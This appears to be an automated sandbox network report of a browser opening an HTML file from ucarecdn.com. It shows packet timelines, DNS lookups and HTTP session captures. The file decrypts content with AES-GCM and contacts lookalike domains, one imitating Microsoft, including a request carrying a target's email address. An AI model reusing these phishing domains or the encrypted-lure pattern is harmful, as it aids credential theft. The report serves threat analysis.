                        Apr 10, 2025 19:21:09.779124975 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.780533075 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.780565023 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.780587912 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.780601978 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.780631065 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.780733109 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.780740023 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.780838966 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.781424046 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.781485081 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.781508923 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.781577110 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.781584024 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.781598091 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.781677008 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.781769037 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.782195091 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.782203913 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:10.070292950 CEST49703443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:21:10.070312977 CEST49702443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:21:10.070343971 CEST44349703167.172.166.226192.168.2.6
                        Apr 10, 2025 19:21:10.070362091 CEST44349702167.172.166.226192.168.2.6
                        Apr 10, 2025 19:21:10.070400953 CEST49703443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:21:10.070522070 CEST49702443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:21:10.070712090 CEST49703443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:21:10.070723057 CEST44349703167.172.166.226192.168.2.6
                        Apr 10, 2025 19:21:10.070859909 CEST49702443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:21:10.070893049 CEST44349702167.172.166.226192.168.2.6
                        Apr 10, 2025 19:21:10.447915077 CEST44349703167.172.166.226192.168.2.6
                        Apr 10, 2025 19:21:10.448023081 CEST49703443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:21:10.449508905 CEST49703443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:21:10.449526072 CEST44349703167.172.166.226192.168.2.6
                        Apr 10, 2025 19:21:10.449811935 CEST44349703167.172.166.226192.168.2.6
                        Apr 10, 2025 19:21:10.450400114 CEST49703443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:21:10.462277889 CEST44349702167.172.166.226192.168.2.6
                        Apr 10, 2025 19:21:10.462343931 CEST49702443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:21:10.463027000 CEST49702443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:21:10.463041067 CEST44349702167.172.166.226192.168.2.6
                        Apr 10, 2025 19:21:10.463273048 CEST44349702167.172.166.226192.168.2.6
                        Apr 10, 2025 19:21:10.492268085 CEST44349703167.172.166.226192.168.2.6
                        Apr 10, 2025 19:21:10.503052950 CEST49702443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:21:10.959558010 CEST44349703167.172.166.226192.168.2.6
                        Apr 10, 2025 19:21:10.959638119 CEST44349703167.172.166.226192.168.2.6
                        Apr 10, 2025 19:21:10.959732056 CEST49703443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:21:10.960180044 CEST49703443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:21:10.960196018 CEST44349703167.172.166.226192.168.2.6
                        Apr 10, 2025 19:21:11.201527119 CEST49704443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:21:11.201562881 CEST44349704167.172.166.226192.168.2.6
                        Apr 10, 2025 19:21:11.201617002 CEST49704443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:21:11.202032089 CEST49704443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:21:11.202042103 CEST44349704167.172.166.226192.168.2.6
                        Apr 10, 2025 19:21:11.231997013 CEST49678443192.168.2.620.42.65.91
                        Apr 10, 2025 19:21:11.565871000 CEST44349704167.172.166.226192.168.2.6
                        Apr 10, 2025 19:21:11.565953970 CEST49704443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:21:11.567087889 CEST49704443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:21:11.567100048 CEST44349704167.172.166.226192.168.2.6
                        Apr 10, 2025 19:21:11.567346096 CEST44349704167.172.166.226192.168.2.6
                        Apr 10, 2025 19:21:11.567718983 CEST49704443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:21:11.612267971 CEST44349704167.172.166.226192.168.2.6
                        Apr 10, 2025 19:21:12.044142962 CEST44349704167.172.166.226192.168.2.6
                        Apr 10, 2025 19:21:12.044222116 CEST44349704167.172.166.226192.168.2.6
                        Apr 10, 2025 19:21:12.044265985 CEST49704443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:21:12.045258045 CEST49704443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:21:12.045269966 CEST44349704167.172.166.226192.168.2.6
                        Apr 10, 2025 19:21:12.271492958 CEST49705443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.271527052 CEST44349705104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.271588087 CEST49705443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.271893024 CEST49706443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.271917105 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.271966934 CEST49706443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.272165060 CEST49705443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.272176981 CEST44349705104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.272387981 CEST49706443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.272399902 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.462929964 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.463004112 CEST49706443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.463860035 CEST44349705104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.463918924 CEST49705443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.464167118 CEST49706443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.464169979 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.464492083 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.465060949 CEST49705443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.465066910 CEST44349705104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.465234041 CEST49706443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.465313911 CEST44349705104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.508295059 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.518953085 CEST49705443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.886384010 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.886425972 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.886459112 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.886483908 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.886509895 CEST49706443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.886518955 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.886548042 CEST49706443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.886550903 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.886684895 CEST49706443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.886693001 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.886732101 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.886822939 CEST49706443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.886827946 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.887712002 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.887736082 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.887763977 CEST49706443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.887773991 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.887816906 CEST49706443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.955172062 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.955348015 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.955420971 CEST49706443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.955427885 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.955452919 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.955559015 CEST49706443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.955565929 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.955739021 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.955799103 CEST49706443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.956832886 CEST49706443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.956842899 CEST44349706104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.965966940 CEST49705443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.995902061 CEST49707443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.995948076 CEST44349707104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:12.996020079 CEST49707443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.996289968 CEST49707443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:12.996299982 CEST44349707104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:13.008272886 CEST44349705104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:13.193900108 CEST44349707104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:13.194389105 CEST49707443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:13.194417953 CEST44349707104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:13.194446087 CEST49707443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:13.194453001 CEST44349707104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:13.256858110 CEST44349705104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:13.257025957 CEST44349705104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:13.257112026 CEST49705443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:13.266688108 CEST49705443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:13.266710043 CEST44349705104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:13.446697950 CEST49708443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:13.446731091 CEST44349708104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:13.446926117 CEST49708443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:13.447055101 CEST49708443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:13.447062016 CEST44349708104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:13.455553055 CEST44349707104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:13.455616951 CEST44349707104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:13.455662012 CEST49707443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:13.459359884 CEST49707443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:13.459367990 CEST44349707104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:13.657063961 CEST44349708104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:13.664341927 CEST49708443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:13.664355040 CEST44349708104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:13.673491001 CEST49708443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:13.673506975 CEST44349708104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:14.223597050 CEST44349708104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:14.223736048 CEST44349708104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:14.223952055 CEST49708443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:14.225532055 CEST49708443192.168.2.6104.21.7.120
                        Apr 10, 2025 19:21:14.225553036 CEST44349708104.21.7.120192.168.2.6
                        Apr 10, 2025 19:21:16.035115004 CEST49678443192.168.2.620.42.65.91
                        Apr 10, 2025 19:21:17.035101891 CEST49672443192.168.2.6204.79.197.203
                        Apr 10, 2025 19:21:17.123577118 CEST44349694142.251.35.164192.168.2.6
                        Apr 10, 2025 19:21:17.123641968 CEST44349694142.251.35.164192.168.2.6
                        Apr 10, 2025 19:21:17.123692989 CEST49694443192.168.2.6142.251.35.164
                        Apr 10, 2025 19:21:17.240242004 CEST49694443192.168.2.6142.251.35.164
                        Apr 10, 2025 19:21:17.240289927 CEST44349694142.251.35.164192.168.2.6
                        Apr 10, 2025 19:21:17.269886017 CEST4971180192.168.2.6142.251.40.99
                        Apr 10, 2025 19:21:17.370717049 CEST8049711142.251.40.99192.168.2.6
                        Apr 10, 2025 19:21:17.370812893 CEST4971180192.168.2.6142.251.40.99
                        Apr 10, 2025 19:21:17.370960951 CEST4971180192.168.2.6142.251.40.99
                        Apr 10, 2025 19:21:17.457988977 CEST8049711142.251.40.99192.168.2.6
                        Apr 10, 2025 19:21:17.458359957 CEST8049711142.251.40.99192.168.2.6
                        Apr 10, 2025 19:21:17.458378077 CEST8049711142.251.40.99192.168.2.6
                        Apr 10, 2025 19:21:17.458390951 CEST8049711142.251.40.99192.168.2.6
                        Apr 10, 2025 19:21:17.458420038 CEST4971180192.168.2.6142.251.40.99
                        Apr 10, 2025 19:21:17.464219093 CEST4971180192.168.2.6142.251.40.99
                        Apr 10, 2025 19:21:17.549143076 CEST8049711142.251.40.99192.168.2.6
                        Apr 10, 2025 19:21:17.549158096 CEST8049711142.251.40.99192.168.2.6
                        Apr 10, 2025 19:21:17.549216032 CEST4971180192.168.2.6142.251.40.99
                        Apr 10, 2025 19:21:25.642963886 CEST49678443192.168.2.620.42.65.91
                        Apr 10, 2025 19:21:53.579651117 CEST49697443192.168.2.6151.101.130.132
                        Apr 10, 2025 19:21:53.579663992 CEST44349697151.101.130.132192.168.2.6
                        Apr 10, 2025 19:21:55.470401049 CEST49702443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:21:55.470459938 CEST44349702167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:06.877563000 CEST49718443192.168.2.6142.251.35.164
                        Apr 10, 2025 19:22:06.877599955 CEST44349718142.251.35.164192.168.2.6
                        Apr 10, 2025 19:22:06.877717018 CEST49718443192.168.2.6142.251.35.164
                        Apr 10, 2025 19:22:06.877852917 CEST49718443192.168.2.6142.251.35.164
                        Apr 10, 2025 19:22:06.877866030 CEST44349718142.251.35.164192.168.2.6
                        Apr 10, 2025 19:22:07.077255011 CEST44349718142.251.35.164192.168.2.6
                        Apr 10, 2025 19:22:07.077832937 CEST49718443192.168.2.6142.251.35.164
                        Apr 10, 2025 19:22:07.077857018 CEST44349718142.251.35.164192.168.2.6
                        Apr 10, 2025 19:22:09.237410069 CEST49697443192.168.2.6151.101.130.132
                        Apr 10, 2025 19:22:09.237663984 CEST44349697151.101.130.132192.168.2.6
                        Apr 10, 2025 19:22:09.237966061 CEST49697443192.168.2.6151.101.130.132
                        Apr 10, 2025 19:22:10.458748102 CEST44349702167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:10.458830118 CEST44349702167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:10.458920956 CEST49702443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:11.238374949 CEST49702443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:11.238411903 CEST44349702167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:17.091559887 CEST44349718142.251.35.164192.168.2.6
                        Apr 10, 2025 19:22:17.091629982 CEST44349718142.251.35.164192.168.2.6
                        Apr 10, 2025 19:22:17.091764927 CEST49718443192.168.2.6142.251.35.164
                        Apr 10, 2025 19:22:17.238167048 CEST49718443192.168.2.6142.251.35.164
                        Apr 10, 2025 19:22:17.238202095 CEST44349718142.251.35.164192.168.2.6
                        Apr 10, 2025 19:22:17.271420956 CEST443496812.23.227.215192.168.2.6
                        Apr 10, 2025 19:22:17.271445990 CEST443496812.23.227.215192.168.2.6
                        Apr 10, 2025 19:22:17.271608114 CEST49681443192.168.2.62.23.227.215
                        Apr 10, 2025 19:22:17.767760038 CEST4971180192.168.2.6142.251.40.99
                        Apr 10, 2025 19:22:17.866600037 CEST8049711142.251.40.99192.168.2.6
                        Apr 10, 2025 19:22:17.866758108 CEST4971180192.168.2.6142.251.40.99
                        Apr 10, 2025 19:22:25.365806103 CEST49730443192.168.2.6142.251.35.164
                        Apr 10, 2025 19:22:25.365859985 CEST44349730142.251.35.164192.168.2.6
                        Apr 10, 2025 19:22:25.365959883 CEST49730443192.168.2.6142.251.35.164
                        Apr 10, 2025 19:22:25.366159916 CEST49730443192.168.2.6142.251.35.164
                        Apr 10, 2025 19:22:25.366175890 CEST44349730142.251.35.164192.168.2.6
                        Apr 10, 2025 19:22:25.552335024 CEST44349730142.251.35.164192.168.2.6
                        Apr 10, 2025 19:22:25.552627087 CEST49730443192.168.2.6142.251.35.164
                        Apr 10, 2025 19:22:25.553755045 CEST49730443192.168.2.6142.251.35.164
                        Apr 10, 2025 19:22:25.553766966 CEST44349730142.251.35.164192.168.2.6
                        Apr 10, 2025 19:22:25.554162979 CEST44349730142.251.35.164192.168.2.6
                        Apr 10, 2025 19:22:25.597240925 CEST49730443192.168.2.6142.251.35.164
                        Apr 10, 2025 19:22:28.413636923 CEST49731443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:28.413681030 CEST44349731167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:28.413799047 CEST49731443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:28.414262056 CEST49731443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:28.414275885 CEST44349731167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:28.414680958 CEST49732443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:28.414690018 CEST44349732167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:28.414784908 CEST49732443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:28.415045023 CEST49732443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:28.415056944 CEST44349732167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:28.800513983 CEST44349731167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:28.800642967 CEST49731443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:28.801749945 CEST49731443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:28.801759958 CEST44349731167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:28.801963091 CEST44349731167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:28.802290916 CEST49731443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:28.815815926 CEST44349732167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:28.815932035 CEST49732443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:28.816433907 CEST49732443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:28.816445112 CEST44349732167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:28.817202091 CEST44349732167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:28.848273993 CEST44349731167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:28.872154951 CEST49732443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:29.291976929 CEST44349731167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:29.292059898 CEST44349731167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:29.292119980 CEST49731443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:29.302190065 CEST49731443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:29.302206993 CEST44349731167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:29.403884888 CEST49736443192.168.2.6167.172.166.226
                        Apr 10, 2025 19:22:29.403914928 CEST44349736167.172.166.226192.168.2.6
                        Apr 10, 2025 19:22:29.403974056 CEST49736443192.168.2.6167.172.166.226
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Timestamp | Source IP | Dest IP | Checksum | Code | Type
                        Apr 10, 2025 19:21:11.234814882 CEST | 192.168.2.6 | 1.1.1.1 | c256 | (Port unreachable) | Destination Unreachable
                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        • ucarecdn.com
                        • cdnjs.cloudflare.com
                        • 33vh88.perthshiregardenrooms.co.uk
                        • microsoftonelineda48b13627.cometlogistics.co.uk
                          • downloadsharedfile.de
                        • c.pki.goog
                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                        0 | 192.168.2.6 | 49711 | 142.251.40.99 | 80
                        Timestamp | Bytes transferred | Direction | Data
                        Apr 10, 2025 19:21:17.370960951 CEST | 202 | OUT | GET /r/gsr1.crl HTTP/1.1
                        Cache-Control: max-age = 3000
                        Connection: Keep-Alive
                        Accept: */*
                        If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
                        User-Agent: Microsoft-CryptoAPI/10.0
                        Host: c.pki.goog
                        Apr 10, 2025 19:21:17.458359957 CEST | 1031 | IN | HTTP/1.1 200 OK
                        Accept-Ranges: bytes
                        Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                        Cross-Origin-Resource-Policy: cross-origin
                        Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                        Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                        Content-Length: 1739
                        X-Content-Type-Options: nosniff
                        Server: sffe
                        X-XSS-Protection: 0
                        Date: Thu, 10 Apr 2025 17:16:39 GMT
                        Expires: Thu, 10 Apr 2025 18:06:39 GMT
                        Cache-Control: public, max-age=3000
                        Age: 278
                        Last-Modified: Mon, 07 Apr 2025 13:58:00 GMT
                        Content-Type: application/pkix-crl
                        Vary: Accept-Encoding
                        Apr 10, 2025 19:21:17.464219093 CEST | 200 | OUT | GET /r/r4.crl HTTP/1.1
                        Cache-Control: max-age = 3000
                        Connection: Keep-Alive
                        Accept: */*
                        If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                        User-Agent: Microsoft-CryptoAPI/10.0
                        Host: c.pki.goog
                        Apr 10, 2025 19:21:17.549143076 CEST | 1031 | IN | HTTP/1.1 200 OK
                        Accept-Ranges: bytes
                        Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                        Cross-Origin-Resource-Policy: cross-origin
                        Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                        Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                        Content-Length: 530
                        X-Content-Type-Options: nosniff
                        Server: sffe
                        X-XSS-Protection: 0
                        Date: Thu, 10 Apr 2025 16:58:38 GMT
                        Expires: Thu, 10 Apr 2025 17:48:38 GMT
                        Cache-Control: public, max-age=3000
                        Age: 1359
                        Last-Modified: Thu, 03 Apr 2025 14:18:00 GMT
                        Content-Type: application/pkix-crl
                        Vary: Accept-Encoding


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.6 | 49698 | 151.101.130.132 | 443 | 4840 | C:\Program Files\Google\Chrome\Application\chrome.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-04-10 17:21:08 UTC | 740 | OUT | GET /6e80a848-4922-47e6-9a12-2e73d2540050/8ff754f5-7513-4298-9573-17aa31ff5b5c.html HTTP/1.1
                        Host: ucarecdn.com
                        Connection: keep-alive
                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: none
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-User: ?1
                        Sec-Fetch-Dest: document
                        Accept-Encoding: gzip, deflate, br, zstd
                        Accept-Language: en-US,en;q=0.9
                        2025-04-10 17:21:08 UTC | 623 | IN | HTTP/1.1 200 OK
                        Connection: close
                        Content-Length: 1872
                        Content-Type: application/octet-stream
                        Cache-Control: public, max-age=31556926, immutable
                        Content-Disposition: attachment; filename=8ff754f5-7513-4298-9573-17aa31ff5b5c.html
                        ETag: "eb64d302c3e2871c4707f72637527fb5"
                        Last-Modified: Thu, 10 Apr 2025 17:16:36 GMT
                        Server: Uploadcare
                        X-Robots-Tag: noindex, nofollow, nosnippet, noarchive
                        Access-Control-Allow-Origin: *
                        Access-Control-Allow-Methods: HEAD, GET, OPTIONS
                        Access-Control-Expose-Headers: HEAD, GET, OPTIONS
                        Accept-Ranges: bytes
                        Age: 0
                        Date: Thu, 10 Apr 2025 17:21:08 GMT
                        x-cache: MISS-CLUSTER
                        2025-04-10 17:21:08 UTC | 1378 | IN | Data Ascii: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></s
                        2025-04-10 17:21:08 UTC | 494 | IN | Data Ascii: { name: 'AES-GCM', iv: hkkfiiec, additionalData: new Uint8Array(), tagLength: 128 }, cryptoKey, new Uint8Array([...IS, ...tag]) ); const decoder = new TextDecoder(); const message = deco


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        1 | 192.168.2.6 | 49700 | 104.17.24.14 | 443 | 4840 | C:\Program Files\Google\Chrome\Application\chrome.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-04-10 17:21:09 UTC | 567 | OUT | GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                        Host: cdnjs.cloudflare.com
                        Connection: keep-alive
                        sec-ch-ua-platform: "Windows"
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                        sec-ch-ua-mobile: ?0
                        Accept: */*
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: no-cors
                        Sec-Fetch-Dest: script
                        Sec-Fetch-Storage-Access: active
                        Accept-Encoding: gzip, deflate, br, zstd
                        Accept-Language: en-US,en;q=0.9
                        2025-04-10 17:21:09 UTC | 964 | IN | HTTP/1.1 200 OK
                        Date: Thu, 10 Apr 2025 17:21:09 GMT
                        Content-Type: application/javascript; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Cf-Ray: 92e3eb43aafede96-EWR
                        Server: cloudflare
                        Access-Control-Allow-Origin: *
                        Cache-Control: public, max-age=30672000
                        Etag: W/"61182885-40eb"
                        Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                        Cf-Cdnjs-Via: cfworker/kv
                        Cross-Origin-Resource-Policy: cross-origin
                        Timing-Allow-Origin: *
                        X-Content-Type-Options: nosniff
                        Cf-Cache-Status: HIT
                        Age: 363539
                        Expires: Tue, 31 Mar 2026 17:21:09 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Iwx0DF9dUHgGZDytFHHld36pgAPEHSvqZsw5EAOoGK7yiMFaTGLG4%2BICoh4KlRIc4iJKOTGALwJ%2FwwCSla7VMWoxT8te%2BpQ1kOG8MOnxz2CicY3QlPOB%2By6a%2BNKi7yVA7JbZ%2BOEd"}],"group":"cf-nel","max_age":604800}
                        Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                        Strict-Transport-Security: max-age=15780000
                        alt-svc: h3=":443"; ma=86400


                        Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                        2           192.168.2.6  49703        167.172.166.226  443               4840  C:\Program Files\Google\Chrome\Application\chrome.exe
                        Timestamp  Bytes transferred  Direction  Data
                        2025-04-10 17:21:10 UTC  698  OUT  GET /aruberg@grahamgoldentech.com HTTP/1.1
                        Host: 33vh88.perthshiregardenrooms.co.uk
